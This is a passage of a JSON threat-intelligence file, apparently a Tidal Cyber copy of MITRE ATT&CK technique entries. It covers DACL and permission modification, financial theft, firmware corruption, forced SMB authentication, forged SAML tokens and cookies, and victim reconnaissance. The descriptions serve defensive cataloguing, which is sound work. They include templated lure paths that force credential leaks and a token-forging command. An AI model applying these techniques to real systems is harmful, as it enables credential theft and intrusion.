2018](https://app.tidalcyber.com/references/32a250ca-a7eb-4d7f-af38-f3e6a09540e2)] Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.[[Microsoft Access Control Lists May 2018](https://app.tidalcyber.com/references/2aeda95a-7741-4a74-a5a4-29a9e7a89451)]\n\nAdversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `cacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://app.tidalcyber.com/technique/9ed0f5c3-49ff-4c43-bb77-c00e466ce3ba), [Boot or Logon Initialization Scripts](https://app.tidalcyber.com/technique/c51f799b-7305-43db-8d3b-657965cad68a), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://app.tidalcyber.com/technique/1085d0c6-4ff3-45f1-8e0c-d8f334f4ba68).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1222.001" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "9d36254c-e568-4c03-8688-e6eed5f7510c", + "value": "Windows File and Directory Permissions Modification" + }, + { + "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.[[Hybrid Analysis Icacls1 June 2018](https://app.tidalcyber.com/references/74df644a-06b8-4331-85a3-932358d65b62)][[Hybrid Analysis Icacls2 May 2018](https://app.tidalcyber.com/references/5d33fcb4-0f01-4b88-b1ee-dad6dcc867f4)] File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nModifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://app.tidalcyber.com/technique/9ed0f5c3-49ff-4c43-bb77-c00e466ce3ba), [Boot or Logon Initialization Scripts](https://app.tidalcyber.com/technique/c51f799b-7305-43db-8d3b-657965cad68a), [Unix Shell Configuration Modification](https://app.tidalcyber.com/technique/cc5ae19f-981d-4004-bb74-260b8ebad73a), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://app.tidalcyber.com/technique/1085d0c6-4ff3-45f1-8e0c-d8f334f4ba68).\n\nAdversaries may also change permissions of symbolic links. For example, malware (particularly ransomware) may modify symbolic links and associated settings to enable access to files from local shortcuts with remote paths.[[new_rust_based_ransomware](https://app.tidalcyber.com/references/8206240f-c84e-442e-b025-f629e9cc8d91)][[bad_luck_blackcat](https://app.tidalcyber.com/references/0d1e9635-b7b6-454b-9482-b1fc7d33bfff)][[falconoverwatch_blackcat_attack](https://app.tidalcyber.com/references/9d0ff77c-09e9-4d58-86f4-e2398f298ca9)][[blackmatter_blackcat](https://app.tidalcyber.com/references/605b58ea-9544-49b8-b3c8-0a97b2b155dc)][[fsutil_behavior](https://app.tidalcyber.com/references/07712696-b1fd-4704-b157-9e420840fb2c)] ", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "5c6687f6-3539-4268-a6a4-2b98fdeac0fb", + "type": "similar" + }, + { + "dest-uuid": "9d36254c-e568-4c03-8688-e6eed5f7510c", + "type": "similar" + } + ], + "uuid": "cb2e4822-2529-4216-b5b8-75158c5f85ff", + "value": "File and Directory Permissions Modification" + }, + { + "description": "Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,[[FBI-ransomware](https://app.tidalcyber.com/references/54e296c9-edcc-5af7-99be-b118da29711f)] business email compromise (BEC) and fraud,[[FBI-BEC](https://app.tidalcyber.com/references/3388bfec-7822-56dc-a384-95aa79f42fe8)] \"pig butchering,\"[[wired-pig butchering](https://app.tidalcyber.com/references/dc833e17-7105-5790-b30b-b4fed7fd2d2f)] bank hacking,[[DOJ-DPRK Heist](https://app.tidalcyber.com/references/c50d2a5b-1d44-5f18-aaff-4be9f6d3f3ac)] and exploiting cryptocurrency networks.[[BBC-Ronin](https://app.tidalcyber.com/references/8e162e39-a58f-5ba0-9a8e-101d4cfa324c)] \n\nAdversaries may [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3) to conduct unauthorized transfers of funds.[[Internet crime report 2022](https://app.tidalcyber.com/references/ef30c4eb-3da3-5c7b-a304-188acd2f7ebc)] In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://app.tidalcyber.com/technique/20417e43-6ffa-5d36-a2ef-e27cd5a4b8f1) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.[[FBI-BEC](https://app.tidalcyber.com/references/3388bfec-7822-56dc-a384-95aa79f42fe8)] This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.[[VEC](https://app.tidalcyber.com/references/4fd7c9f7-4731-524a-b332-9cb7f2c025ae)]\n\nExtortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://app.tidalcyber.com/technique/f0c36d24-263c-4811-8784-f716c77ec6b3) [[NYT-Colonial](https://app.tidalcyber.com/references/58900911-ab4b-5157-968c-67fa69cc122d)] and [Exfiltration](https://app.tidalcyber.com/tactics/66249a6d-be4e-43ab-a295-349d03a98023) of data, followed by threatening public exposure unless payment is made to the adversary.[[Mandiant-leaks](https://app.tidalcyber.com/references/aecc3ffb-c524-5ad9-b621-7228f53e27c3)]\n\nDue to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34) and business disruption.[[AP-NotPetya](https://app.tidalcyber.com/references/7f1af58a-33fd-538f-b092-789a8776780c)]", + "meta": { + "platforms": [ + "Google Workspace", + "Linux", + "macOS", + "Office 365", + "SaaS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f", + "type": "uses" + } + ], + "uuid": "b9c9fd13-c10c-5e78-aeeb-ac18dc0605f9", + "value": "Financial Theft" + }, + { + "description": "Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot, thus denying the availability to use the devices and/or the system.[[Symantec Chernobyl W95.CIH](https://app.tidalcyber.com/references/a35cab17-634d-4a7a-a42c-4a4280e8785d)] Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices may include the motherboard, hard drive, or video cards.\n\nIn general, adversaries may manipulate, overwrite, or corrupt firmware in order to deny the use of the system or devices. For example, corruption of firmware responsible for loading the operating system for network devices may render the network devices inoperable.[[dhs_threat_to_net_devices](https://app.tidalcyber.com/references/f1d16045-d365-43d2-bc08-65ba1ddbe0fd)][[cisa_malware_orgs_ukraine](https://app.tidalcyber.com/references/ebe89b36-f87f-4e09-8030-a1328c0b8683)] Depending on the device, this attack may also result in [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34). ", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Network", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f", + "type": "uses" + } + ], + "uuid": "559c647a-7759-4943-856d-dc717b5a443e", + "value": "Firmware Corruption" + }, + { + "description": "Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.\n\nThe Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. [[Wikipedia Server Message Block](https://app.tidalcyber.com/references/3ea03c65-12e0-4e28-bbdc-17bb8c1e1831)] This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.\n\nWeb Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. [[Didier Stevens WebDAV Traffic](https://app.tidalcyber.com/references/b521efe2-5c1c-48c5-a2a9-95da2367f537)] [[Microsoft Managing WebDAV Security](https://app.tidalcyber.com/references/eeb7cd82-b116-4989-b3fa-968a23f839f3)]\n\nAdversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://app.tidalcyber.com/technique/02b8e7c1-0db7-43f5-a5bc-531b30395122)), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information, including the user's hashed credentials, over SMB to the adversary controlled server. [[GitHub Hashjacking](https://app.tidalcyber.com/references/d31f6612-c552-45e1-bf6b-889fe619ab5f)] With access to the credential hash, an adversary can perform off-line [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c) cracking to gain access to plaintext credentials. [[Cylance Redirect to SMB](https://app.tidalcyber.com/references/32c7626a-b284-424c-8294-7fac37e71336)]\n\nThere are several different ways this can occur. [[Osanda Stealing NetNTLM Hashes](https://app.tidalcyber.com/references/991f885e-b3f4-4f3f-b0f9-c9862f918f36)] Some specifics from in-the-wild use include:\n\n* A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. [Template Injection](https://app.tidalcyber.com/technique/02b8e7c1-0db7-43f5-a5bc-531b30395122)). The document can include, for example, a request similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request. [[US-CERT APT Energy Oct 2017](https://app.tidalcyber.com/references/e34ddf0a-a112-4557-ac09-1ff540241a89)]\n* A modified .LNK or .SCF file with the icon filename pointing to an external reference such as \\\\[remote address]\\pic.png that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. [[US-CERT APT Energy Oct 2017](https://app.tidalcyber.com/references/e34ddf0a-a112-4557-ac09-1ff540241a89)]", + "meta": { + "platforms": [ + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "e732e1d4-fffa-4fc3-b387-47782c821688", + "value": "Forced Authentication" + }, + { + "description": "An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.[[Microsoft SolarWinds Steps](https://app.tidalcyber.com/references/33e84eb1-4835-404b-8c1a-40695c04cdb4)] The default lifetime of a SAML token is one hour, but the validity period can be specified in the NotOnOrAfter value of the conditions ... element in a token. This value can be changed using the AccessTokenLifetime in a LifetimeTokenPolicy.[[Microsoft SAML Token Lifetimes](https://app.tidalcyber.com/references/8b810f7c-1f26-420b-9014-732f1469f145)] Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.[[Cyberark Golden SAML](https://app.tidalcyber.com/references/58083370-8126-47d3-827c-1910ed3f4b2a)]\n\nAn adversary may utilize [Private Keys](https://app.tidalcyber.com/technique/e493bf4a-0eba-4e60-a7a6-c699084dc98a) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.[[Microsoft SolarWinds Customer Guidance](https://app.tidalcyber.com/references/b486ae40-a854-4998-bf1b-aaf6ea2047ed)] This differs from [Steal Application Access Token](https://app.tidalcyber.com/technique/f78f2c87-626a-468f-93a5-31b61be17727) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.\n\nAn adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://app.tidalcyber.com/technique/28f65214-95c1-4a72-b385-0b32cbcaea8f), which may bypass multi-factor and other authentication protection mechanisms.[[Microsoft SolarWinds Customer Guidance](https://app.tidalcyber.com/references/b486ae40-a854-4998-bf1b-aaf6ea2047ed)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1606.002" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "dc0aecef-3cb2-4381-b6e4-dfa7be16d42b", + "value": "SAML Tokens" + }, + { + "description": "Adversaries may forge web cookies that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies to authenticate and authorize user access.\n\nAdversaries may generate these cookies in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://app.tidalcyber.com/technique/17f9e46d-4e3d-4491-a0d9-0cc042531d6e) and other similar behaviors in that the cookies are new and forged by the adversary, rather than stolen or intercepted from legitimate users. Most common web applications have standardized and documented cookie values that can be generated using provided tools or interfaces.[[Pass The Cookie](https://app.tidalcyber.com/references/dc67930f-5c7b-41be-97e9-d8f4a55e6019)] The generation of web cookies often requires secret values, such as passwords, [Private Keys](https://app.tidalcyber.com/technique/e493bf4a-0eba-4e60-a7a6-c699084dc98a), or other cryptographic seed values.\n\nOnce forged, adversaries may use these web cookies to access resources ([Web Session Cookie](https://app.tidalcyber.com/technique/d36a5323-e249-44e8-9c8b-5cc9c023a5e1)), which may bypass multi-factor and other authentication protection mechanisms.[[Volexity SolarWinds](https://app.tidalcyber.com/references/355cecf8-ef3e-4a6e-a652-3bf26fe46d88)][[Pass The Cookie](https://app.tidalcyber.com/references/dc67930f-5c7b-41be-97e9-d8f4a55e6019)][[Unit 42 Mac Crypto Cookies January 2019](https://app.tidalcyber.com/references/0a88e730-8ed2-4983-8f11-2cb2e4abfe3e)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1606.001" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "b0966c0f-1e09-4d5d-acff-0ca79dc9da89", + "value": "Web Cookies" + }, + { + "description": "Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access.\n\nAdversaries may generate these credential materials in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://app.tidalcyber.com/technique/17f9e46d-4e3d-4491-a0d9-0cc042531d6e), [Steal Application Access Token](https://app.tidalcyber.com/technique/f78f2c87-626a-468f-93a5-31b61be17727), and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users.\n\nThe generation of web credentials often requires secret values, such as passwords, [Private Keys](https://app.tidalcyber.com/technique/e493bf4a-0eba-4e60-a7a6-c699084dc98a), or other cryptographic seed values.[[GitHub AWS-ADFS-Credential-Generator](https://app.tidalcyber.com/references/340a3a20-0ee1-4fd8-87ab-10ac0d2a50c8)] Adversaries may also forge tokens by taking advantage of features such as the `AssumeRole` and `GetFederationToken` APIs in AWS, which allow users to request temporary security credentials (i.e., [Temporary Elevated Cloud Access](https://app.tidalcyber.com/technique/448dc009-2d3f-5480-aba3-0d80dc4336cd)), or the `zmprov gdpak` command in Zimbra, which generates a pre-authentication key that can be used to generate tokens for any user in the domain.[[AWS Temporary Security Credentials](https://app.tidalcyber.com/references/c6f29134-5af2-42e1-af4f-fbb9eae03432)][[Zimbra Preauth](https://app.tidalcyber.com/references/f8931e8d-9a03-5407-857a-2a1c5a895eed)]\n\nOnce forged, adversaries may use these web credentials to access resources (ex: [Use Alternate Authentication Material](https://app.tidalcyber.com/technique/28f65214-95c1-4a72-b385-0b32cbcaea8f)), which may bypass multi-factor and other authentication protection mechanisms.[[Pass The Cookie](https://app.tidalcyber.com/references/dc67930f-5c7b-41be-97e9-d8f4a55e6019)][[Unit 42 Mac Crypto Cookies January 2019](https://app.tidalcyber.com/references/0a88e730-8ed2-4983-8f11-2cb2e4abfe3e)][[Microsoft SolarWinds Customer Guidance](https://app.tidalcyber.com/references/b486ae40-a854-4998-bf1b-aaf6ea2047ed)] ", + "meta": { + "platforms": [ + "Azure AD", + "Google Workspace", + "IaaS", + "Linux", + "macOS", + "Office 365", + "SaaS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + }, + { + "dest-uuid": "dc0aecef-3cb2-4381-b6e4-dfa7be16d42b", + "type": "similar" + }, + { + "dest-uuid": "b0966c0f-1e09-4d5d-acff-0ca79dc9da89", + "type": "similar" + } + ], + "uuid": "d8507187-cea6-4be2-95b4-e875924e58c0", + "value": "Forge Web Credentials" + }, + { + "description": "Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.[[ATT ScanBox](https://app.tidalcyber.com/references/48753fc9-b7b7-465f-92a7-fb3f51b032cb)] Information about the client configurations may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [Supply Chain Compromise](https://app.tidalcyber.com/technique/b72c8a96-5e03-40c2-ac0c-f77b73fe493f) or [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1592.004" + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + } + ], + "uuid": "bc4f11b1-fd06-4e49-be48-e73ece82f1a9", + "value": "Client Configurations" + }, + { + "description": "Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about host firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).[[ArsTechnica Intel](https://app.tidalcyber.com/references/99151b50-3dd8-47b5-a48f-2e3b450944e9)] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [Supply Chain Compromise](https://app.tidalcyber.com/technique/b72c8a96-5e03-40c2-ac0c-f77b73fe493f) or [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a)).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1592.003" + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + } + ], + "uuid": "8af6a9ee-c323-44fa-85d3-29366fd1bb4f", + "value": "Firmware" + }, + { + "description": "Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) (ex: hostnames, server banners, user agent strings) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.[[ATT ScanBox](https://app.tidalcyber.com/references/48753fc9-b7b7-465f-92a7-fb3f51b032cb)] Information about the hardware infrastructure may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [Compromise Hardware Supply Chain](https://app.tidalcyber.com/technique/53fea37d-be26-4bed-a8a1-1d67f7cbffcf) or [Hardware Additions](https://app.tidalcyber.com/technique/4557bfb9-b940-49b6-b8be-571979134419)).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1592.001" + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + } + ], + "uuid": "a5ab5108-1582-4357-b948-1c6148c7b5ce", + "value": "Hardware" + }, + { + "description": "Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.[[ATT ScanBox](https://app.tidalcyber.com/references/48753fc9-b7b7-465f-92a7-fb3f51b032cb)] Information about the installed software may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or for initial access (ex: [Supply Chain Compromise](https://app.tidalcyber.com/technique/b72c8a96-5e03-40c2-ac0c-f77b73fe493f) or [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1592.002" + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + } + ], + "uuid": "77476b73-f4d1-4689-8f9e-af08d27f4cba", + "value": "Software" + }, + { + "description": "Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.[[ATT ScanBox](https://app.tidalcyber.com/references/48753fc9-b7b7-465f-92a7-fb3f51b032cb)] Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [Supply Chain Compromise](https://app.tidalcyber.com/technique/b72c8a96-5e03-40c2-ac0c-f77b73fe493f) or [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).", + "meta": { + "platforms": [ + "PRE" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + }, + { + "dest-uuid": "bc4f11b1-fd06-4e49-be48-e73ece82f1a9", + "type": "similar" + }, + { + "dest-uuid": "8af6a9ee-c323-44fa-85d3-29366fd1bb4f", + "type": "similar" + }, + { + "dest-uuid": "a5ab5108-1582-4357-b948-1c6148c7b5ce", + "type": "similar" + }, + { + "dest-uuid": "77476b73-f4d1-4689-8f9e-af08d27f4cba", + "type": "similar" + } + ], + "uuid": "4acf57da-73c1-4555-a86a-38ea4a8b962d", + "value": "Gather Victim Host Information" + }, + { + "description": "Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.\n\nAdversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Adversaries may also compromise sites then add malicious content designed to collect website authentication cookies from visitors.[[ATT ScanBox](https://app.tidalcyber.com/references/48753fc9-b7b7-465f-92a7-fb3f51b032cb)] Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://app.tidalcyber.com/technique/62bc11f9-f88c-437a-98ae-e90def576e7e), breach dumps, code repositories, etc.).[[Register Deloitte](https://app.tidalcyber.com/references/e6b10687-8666-4c9c-ac77-1988378e096d)][[Register Uber](https://app.tidalcyber.com/references/89b85928-a962-4230-875c-63742b3c9d37)][[Detectify Slack Tokens](https://app.tidalcyber.com/references/46c40ed4-5a15-4b38-b625-bebc569dbf69)][[Forbes GitHub Creds](https://app.tidalcyber.com/references/303f8801-bdd6-4a0c-a90a-37867898c99c)][[GitHub truffleHog](https://app.tidalcyber.com/references/324a563f-55ee-49e9-9fc7-2b8e35f36875)][[GitHub Gitrob](https://app.tidalcyber.com/references/1dee0842-15cc-4835-b8a8-938e0c94807b)][[CNET Leaks](https://app.tidalcyber.com/references/46df3a49-e7c4-4169-b35c-0aecc78c31ea)] Adversaries may also purchase credentials from dark web or other black-markets. Finally, where multi-factor authentication (MFA) based on out-of-band communications is in use, adversaries may compromise a service provider to gain access to MFA codes and one-time passwords (OTP).[[Okta Scatter Swine 2022](https://app.tidalcyber.com/references/66d1b6e2-c069-5832-b549-fc5f0edeed40)]\n\nGathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06)), establishing operational resources (ex: [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)). ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1589.001" + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + } + ], + "uuid": "e5d9c785-61bd-483f-b2ac-5bd9a8641b22", + "value": "Credentials" + }, + { + "description": "Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have 